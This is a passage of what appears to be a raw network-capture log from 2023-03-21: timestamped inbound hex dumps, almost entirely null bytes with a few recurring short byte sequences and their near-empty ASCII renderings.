                                                                                                                            2023-03-21 07:00:13 UTC4403INData Raw: 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:13 UTC4419INData Raw: 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0CA_|
                                                                                                                            2023-03-21 07:00:13 UTC4435INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4435INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:13 UTC4451INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4467INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4483INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|
                                                                                                                            2023-03-21 07:00:13 UTC4499INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4515INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:13 UTC4531INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4547INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|
                                                                                                                            2023-03-21 07:00:13 UTC4563INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:13 UTC4579INData Raw: 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4595INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:13 UTC4611INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4611INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|0
                                                                                                                            2023-03-21 07:00:13 UTC4627INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4643INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:13 UTC4659INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:13 UTC4675INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0CA_|
                                                                                                                            2023-03-21 07:00:13 UTC4691INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:13 UTC4707INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4723INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4739INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|
                                                                                                                            2023-03-21 07:00:13 UTC4755INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4771INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:13 UTC4787INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4803INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|
